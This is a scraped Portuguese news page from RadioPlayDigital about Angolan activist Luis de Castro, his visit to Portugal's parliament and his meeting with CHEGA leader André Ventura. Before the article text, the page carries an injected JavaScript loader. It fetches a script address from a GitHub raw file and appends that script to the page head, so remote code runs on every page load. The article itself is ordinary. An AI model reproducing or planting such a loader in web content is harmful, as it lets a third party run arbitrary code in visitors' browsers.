;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); A Última Palavra, com o activista cívico Luis de Castro | RadioPlayDigital
A Última Palavra, com o activista cívico Luis de Castro
A ÚLTIMA PALAVRA – Grande entrevista na MFM com o activista cívico ©Luis de Castro.
 
O convidado de hoje vem da capital do Planalto Central de Angola, Huambo. Um activista cívico, uma voz que não se cala, incómoda e inconformada, denunciando as injustiças, as desigualdades sociais, as sucessivas violações dos direitos humanos e a má governação.

O ativista angolano Luis de Castro, da ONG Jango Cultural teve uma experiência marcante na passada quinta-feira (15/02), ao ser recebido na Assembleia da República de Portugal como parte de um exercício diplomático e de troca de experiências.

O encontro foi conduzido por . Manuel Matias, que hospedou uma conversa detalhada com Luis de Castro sobre uma variedade de assuntos políticos, sociais e culturais relacionados tanto com Angola quanto com Portugal. Manuel Matias, renomado político e membro-fundador do partido PROVIDA, também é pai da deputada mais jovem de Portugal, Rita Matias.

 

Após esse encontro, Luis de Castro teve a oportunidade de se reunir com o Presidente do partido CHEGA, André Ventura. Durante o encontro com o candidato às eleições Legislativas, foram discutidos temas como o combate à corrupção e a questão da emigração. Foi possível estreitar laços de amizade e compartilhar experiências com um dos políticos mais notáveis e de crescente popularidade em Portugal.



 Em exclusivo ao Club-K, o Presidente do Jango Cultural destacou que, durante as discussões, André Ventura compartilhou sua visão para a comunidade estrangeira, com ênfase nas comunidades africanas, de acordo com o programa eleitoral do partido CHEGA.

 

Relacionados